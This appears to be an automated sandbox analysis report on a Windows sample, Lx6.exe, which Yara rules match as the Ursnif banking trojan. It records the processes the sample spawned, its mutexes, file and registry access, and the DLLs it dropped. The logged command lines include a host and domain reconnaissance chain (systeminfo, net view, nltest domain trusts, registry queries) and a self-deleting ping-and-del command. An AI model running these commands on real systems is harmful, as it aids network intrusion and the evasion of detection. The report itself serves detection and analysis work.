Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain |more > C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1 Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Users\user\Desktop\Lx6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076FD17 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0076FD17
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2692:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Mutant created: \Sessions\1\BaseNamedObjects\{B0580A46-4F94-62F5-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe Mutant created: \Sessions\1\BaseNamedObjects\{D81B4F77-576D-CA2A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_01
Source: C:\Windows\System32\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{D44985C1-232B-2616-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Mutant created: \Sessions\1\BaseNamedObjects\{78F747AD-7754-6AA7-C12C-9B3E8520FF52}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{443CA95C-D31A-1662-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Mutant created: \Sessions\1\BaseNamedObjects\{E47BD961-F315-B6E2-9D58-D74A210CFB1E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{48DADAAC-07B9-BA22-D1FC-2B8E95F08FA2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Mutant created: \Sessions\1\BaseNamedObjects\{6CC2E80A-DBDA-7E52-C560-3F92C994E3E6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075B106 push ecx; mov dword ptr [esp], 00000002h 0_2_0075B107
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00772AB3 push ecx; ret 0_2_00772AC3
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00772580 push ecx; ret 0_2_00772589
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00769772 push ss; ret 0_2_00769773
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03042AB3 push ecx; ret 35_2_03042AC3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302B106 push ecx; mov dword ptr [esp], 00000002h 35_2_0302B107
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03039772 push ss; ret 35_2_03039773
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03042580 push ecx; ret 35_2_03042589
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\msihj3zd.dll Jump to dropped file

Boot Survival
barindex
Uses net.exe to modify the status of services
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
